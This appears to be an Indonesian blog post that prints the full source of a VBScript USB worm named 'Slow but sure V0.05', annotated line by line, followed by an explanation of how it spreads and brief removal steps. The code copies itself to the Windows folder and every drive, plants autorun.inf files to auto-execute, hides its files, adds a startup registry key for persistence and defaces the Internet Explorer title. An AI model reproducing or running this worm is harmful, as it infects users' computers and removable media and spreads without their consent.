'My name is Slow but sure V0.05
- Komentar
on error resume next
- Ini merupakan suatu perintah untuk melanjutkan operasi jika terjadi
Kesalahan
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
- Ini merupakan deklarasi variabel
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
- Ini merupakan file auto-run
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
- File induk
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and
flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
- Untuk menyebarkan melalui Removable Disc yang ditambahkan
dengan auto-run.inf
set rg = createobject("WScript.Shell")
rg.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Main\Window Title","Hacked by Godzilla"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
- Manipulasi Registry
CARA KERJA VIRUS
1. Virus ini meng-copy dirinya ke setiap drive, dan juga membuat file
autorun.inf ke setiap drive, agar user yang membuka drive tersebut
secara normal (bukan lewat explorer atau cmd) secara otomatis
menjalankan autorun.inf (Autoplay) dimana isi autorun.inf tersebut
adalah menjalankan code-code virus. Selanjutnya men-set attribut
untuk file-file yang di-copy tersebut. Meletakkan dirinya ke start-up
registry, mengganti title Internet Explorer.
2. Script virus meng-copykan dirinya ke C:\WINDOWS\MS32DLL.dll.vbs
dan menciptakan tempat tinggal-nya di Startup agar 'diri-nya' tetap
exist di system yang sudah terinfeksi.
3. File autorun.inf didalam script virus ini akan berjalan otomatis ketika
anda menyimpannya di flash disc dan dicolokkan ke PC dan
Removable Drive anda menampilkan isinya yang kemudian akan
menjalankan Microsoft (r) Windows Based Script Host (wscript.exe)
yang terletak di directory C:\WINDOWS\system32 (default dir) untuk
meng-eksekusi sebuah file Visual Basic Script (*.vbs), yang tidak lain
adalah MS32DLL.dll.vbs di Removable Drive yang sudah terinfeksi.
CARA PENANGGULANGAN
1. Panggil task manager, bisa melalui ctrl+shift bersamaan lalu tekan esc
di processes bunuh semua wscript.exe yang ada
2. Hapus semua file MS32DLL.dll.vbs serta autorun.inf di setiap drive
3. Hapus file induknya di c:\windows\system32 yang bernama
MS32DLL.dll.vbs
0 komentar:
Posting Komentar